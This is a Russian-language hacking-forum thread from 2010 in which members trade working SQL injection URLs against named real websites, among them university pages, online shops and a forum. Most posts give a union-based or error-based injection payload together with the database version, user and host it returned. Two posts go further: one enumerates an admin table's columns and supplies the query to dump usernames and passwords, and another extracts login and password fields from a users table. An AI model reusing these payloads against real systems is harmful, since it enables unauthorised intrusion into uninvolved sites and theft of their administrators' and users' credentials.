HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.03.2010, 22:17
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
С нами: 9171191

Репутация: 43
По умолчанию

http://ebusiness.byu.edu/book_review.php?ID=-19+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+76,1%20--
 
Ответить с цитированием

  #2  
Старый 15.03.2010, 23:30
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

На основном домене

http://www.stanford.edu/group/spatialhistory/cgi-bin/site/pub.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36--+

pr 9, тиц 4100

Последний раз редактировалось v1d0qz; 15.03.2010 в 23:33..
 
Ответить с цитированием

  #3  
Старый 16.03.2010, 01:43
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Код:
http://www.yickyak.com/news.php?catid=9%27+and+(select+1+from+(select+count(0),concat((select+version()+from+debates+limit+1),floor(rand(0)*2))+from+debates+group+by+2+limit+1)a)+and+%27123%27=%27123
version: 4.1.22-max-log1
user: yydbmain@72.167.131.1571
database: yydbmain1
 
Ответить с цитированием

  #4  
Старый 16.03.2010, 02:38
Red_EYEs
Познающий
Регистрация: 07.08.2009
Сообщений: 36
С нами: 8822446

Репутация: 34
По умолчанию

Цитата:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/pub.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36--+
круто но вот там доступны только таблицы касающиеся раздела. Ничего интересного в них нет.

http://www.waterpump.com.ua/news.php?news_id=-61%20union%20select%201,2,3,VERSION(),USER(),6%20--
 
Ответить с цитированием

  #5  
Старый 16.03.2010, 02:38
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

http://www.met-con.com/index.php

Код:
http://www.met-con.com/about/showEmp.php?id=1-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables--
5.0.89-community


PS: Вроде ниче интересного

______

http://www.tshome.com.tw/news-con.php?id=1-1%20union%20select%201,version(),3,4,5,6%20--

5.0.45-log

Китайцы сцук

____________

http://ocenshik.mostpp.ru/news.php?id=1-1%20union%20select%201,2,3,4,version(),6,7,8%20--

4.0.27
ТОП какой дебильный

______

http://www.belt-wrestling.org/en/news.php?id=1-1%20union%20select%201,2,3,4,5,6,7,version(),9%20--

4.1.22-standard

Сайт - ресслеров.. Надеюсь не побьют..
Таблиц не могу найти
________________
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,version(),6,7,8,9%2 0--
5.0.67-log

ОО кое чето поинтереснее =)
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,group_concat(column _name),6,7,8,9%20from%20information_schema.columns %20where%20table_name=0x61646d696e--
Отсюда узнаем колоночки (username,password) Хотя я и не сомневался =)

и Ну вобщем пароль нельзя выкладывать так что кому надо откопает сам
Код:
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9%20from%20admin--
_________________

http://www.sexshop24.ee/tm.php?id=1-1%20union%20select%20concat_ws(0x3a,ID,login,passw d)%20from%20ip_users%20--
5.0.67-log

Последний раз редактировалось Assembler; 16.03.2010 в 07:33..
 
Ответить с цитированием

  #6  
Старый 17.03.2010, 01:27
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
С нами: 9171191

Репутация: 43
По умолчанию

Код HTML:
http://www.bilyardia.ru/zeus.catalog.phtml?idTowar=-41+union+select+1,2,user%28%29,4,version%28%29,6,7,8,9,10%20--
ТИЦ = 190

4.0.27-max-log
zeusspb9_shop@v12.valuehost.ru
 
Ответить с цитированием

  #7  
Старый 17.03.2010, 03:20
Lam3rsha
Новичок
Регистрация: 25.10.2008
Сообщений: 10
С нами: 9233836

Репутация: 18
По умолчанию

http://www.cmb.su/index.php?nomer=58'+UNION+SELECT+1,2,3,4,CONCAT(0x 7873716C696E6A626567696E,Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),6 ,7,8,9,10+LIMIT+1, 1/*

Database Version: 5.0.45
User name: baltimed@localhost




http://www.dogshop.lv/index.php?part=3&part2=79+union+select+1,2,3,user( ),5,6,7,8,9,10+limit+1, 1/*

Database Version: 4.1.21-standard
User name: dogusr24@localhost

Последний раз редактировалось Lam3rsha; 17.03.2010 в 03:34..
 
Ответить с цитированием

  #8  
Старый 17.03.2010, 15:16
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

_http://ru-board.com
Код:
http://ru-board.com/new/article.php?sid=108+and+1=2+UNION+SELECT+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10+--+
phpnuke: phpnuke@localhost: 5.0.77
 
Ответить с цитированием

  #9  
Старый 17.03.2010, 15:48
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

Цитата:
Сообщение от Seravin  
_http://ru-board.com
Код:
http://ru-board.com/new/article.php?sid=108+and+1=2+UNION+SELECT+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10+--+
phpnuke: phpnuke@localhost: 5.0.77
это вроде уже боян хотя в другом скрипте скуля...
Код:
http://ru-board.com/new/search.php?author=-lynx%27+union+select+1,2,3,concat_ws%28%27.%27,table_schema,table_name,column_name%29,5,6,7,8,9,10+from+information_schema.columns+--+
 
Ответить с цитированием

  #10  
Старый 18.03.2010, 00:10
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
http://www.labstend.ru/site/index/uch_tech/index_full.php?mode=full&id=161&id_cat=602+or(1,2) =(select+*+from(select+name_const(concat_ws(0x3a,v ersion(),user(),database()),1),name_const(concat_w s(0x3a,version(),user(),database()),1))a)--+
5.0.45:labstend@localhost:rosuch_cms
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.